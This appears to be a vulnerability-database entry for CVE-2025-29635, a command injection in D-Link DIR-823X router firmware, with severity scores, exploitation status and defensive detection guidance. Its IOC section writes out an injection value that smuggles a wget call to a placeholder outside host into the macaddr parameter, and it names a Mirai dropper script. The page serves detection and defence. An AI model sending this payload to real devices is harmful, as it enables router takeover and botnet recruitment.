cbcvebase.
CVE-2025-29635
published 2025-03-25

CVE-2025-29635: A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending…

PriorityP189high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2026-05-08
Exploited in the wild
EPSS
87.24%
99.7th percentile
A command injection vulnerability in D-Link DIR-823X 240126 and 240802 allows an authorized attacker to execute arbitrary commands on remote devices by sending a POST request to /goform/set_prohibiting via the corresponding function, triggering remote command execution.

Affected

2 ranges
VendorProductVersion rangeFixed in
dlinkdir-823x_firmware
dlinkdir-823x_firmware

Detection & IOCsextracted from sources · hover to see the quote

url/goform/set_prohibiting
filenamedlink.sh
commandmacaddr=||wget http://{{interactsh-url}}||&token=00000000000000000000000000000000
sigma
POST /goform/set_prohibiting with macaddr parameter containing shell metacharacters (||, ;, &)
  • Detect POST requests to /goform/set_prohibiting endpoint on D-Link DIR-823X devices; inspect the 'macaddr' parameter for shell injection metacharacters (||, ;, &, backtick).
  • Hunt for outbound wget/curl requests from D-Link DIR-823X devices fetching 'dlink.sh' from external IPs, indicative of the tuxnokill Mirai variant dropper stage.
  • Monitor for the 'tuxnokill' Mirai botnet variant process name or DDoS traffic patterns (TCP SYN/ACK/STOMP, UDP floods, HTTP null) originating from DIR-823X devices.
  • Use Shodan query 'title:"D-Link"' or FOFA query 'title="DIR-823X"' to identify internet-exposed vulnerable devices for proactive blocking or monitoring.
  • The same threat actor also exploits CVE-2023-1389 (TP-Link) and an RCE in ZTE ZXV10 H108L with the same attack pattern; correlate multi-CVE exploitation campaigns targeting these device families.
  • Check Point IPS signature available: 'D-Link DIR-823X Command Injection (CVE-2025-29635)' — deploy for network-level detection.
  • ·Exploitation requires the attacker to be authenticated/authorized on the device; unauthenticated exploitation is not indicated by current reporting.
  • ·Affected firmware versions are 240126 and 240802 only; devices are end-of-life (EoL) as of November 2024 and no patch is expected from D-Link.
  • ·A PoC exploit was briefly published on GitHub by the original researchers but was subsequently retracted.

CVSS provenance

nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
vulncheck8.8HIGH
cisa8.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.